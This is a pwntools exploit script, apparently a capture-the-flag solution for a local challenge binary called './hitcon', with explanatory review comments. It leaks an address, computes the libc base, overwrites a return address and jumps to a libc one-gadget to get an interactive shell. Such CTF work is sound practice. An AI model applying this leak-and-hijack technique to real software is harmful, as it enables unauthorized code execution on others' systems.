from pwn import *

# Proof-of-concept interaction script for the local challenge binary
# './hitcon', driven with pwntools. The script is Python 2 syntax (the
# `print` statement on the "0x%x 0x%x" line and the str/bytes mixing when
# the received line is concatenated with '\x00'); it will not run unmodified
# under Python 3.
#
# Every menu choice, prompt string and filler length below is tied to the
# exact build of the binary and of the libc it was run against; the numeric
# constants (0x52a900, 0x1002908, 0x90, 0x40c3f) are layout/offset values
# that only hold for that environment — TODO confirm against the target build
# before relying on them.
p = process('./hitcon')
# PID is printed so a debugger can be attached by hand (see the commented-out
# gdb.attach below).
print(pidof(p))
# gdb.attach(p)

# A permutation of 1..9; each entry is paired with its 1-based index and sent
# as "<index> <value>" in the loop below. Why this particular ordering matters
# is not visible from the script — presumably dictated by the challenge logic.
order = [2,3,5,1,8,9,6,4,7]

# Menu option 3 (the menu ends with a line "Exit").
p.sendlineafter('Exit\n', '3')

# Nine rounds: swallow five separator lines, then answer with "i order[i]".
for i in range(9):
    for _ in range(5):
        p.recvuntil('----------------------------------------\n')
    p.sendline('%d %d' % (i + 1, order[i]))

# Menu option 4.
p.sendlineafter('Exit\n', '4')

# 1 - Any
p.sendlineafter('Soldiers\n', '1')

# 2 - Jesmon
p.sendlineafter('Salvation\n', '2')
# context.log_level = 'DEBUG'
# Fixed-length write (93 bytes of 0x71, no trailing newline) in reply to the
# "questions?" prompt. The line read back immediately afterwards is treated as
# leaked address material.
p.sendafter('questions?\n', '\x71' * 93)

# Read one line, drop the newline, prepend a NUL and pad to 8 bytes before
# unpacking as little-endian u64. Prepending '\x00' assumes the low byte of the
# leaked value is zero and was not echoed — TODO confirm. NOTE(review): there is
# no length check; if more than 7 bytes come back, ljust is a no-op and u64
# will reject the input, so the script fails here rather than later.
thread_fs_addr = p.recvuntil('\n')[:-1]
thread_fs_addr = u64(('\x00' + thread_fs_addr).ljust(8, '\x00'))
# libc base is derived from the leaked value by a constant that encodes the
# distance between the two mappings in the reference environment.
libc_addr = thread_fs_addr + 0x52a900
print "0x%x 0x%x" % (libc_addr, thread_fs_addr)

# Second fixed-length write (0x1f filler bytes) for the "please?" prompt.
p.sendafter('please?\n', 'a' * 0x1f)

# 3 - Angelboy
# NOTE(review): the label says "3" but the choice actually sent is '2';
# presumably the label refers to the step number, not the menu item — confirm.
p.sendlineafter('Exploit\n', '2')
# Target address is computed relative to the leaked value; the 8-byte word
# (offset by 0x90) is placed after 91 filler bytes at the "questions?" prompt.
qa_ret_addr = thread_fs_addr - 0x1002908
p.sendafter('questions?\n', 'a' * 91 + p64(qa_ret_addr + 0x90))

# Address of a libc one-gadget at a fixed offset from the derived libc base;
# written as an 8-byte little-endian word at the "please?" prompt.
one_gadget_addr = libc_addr + 0x40c3f
p.sendafter('please?\n', p64(one_gadget_addr))

# Hand the terminal over to the user for whatever the process does next.
p.interactive()
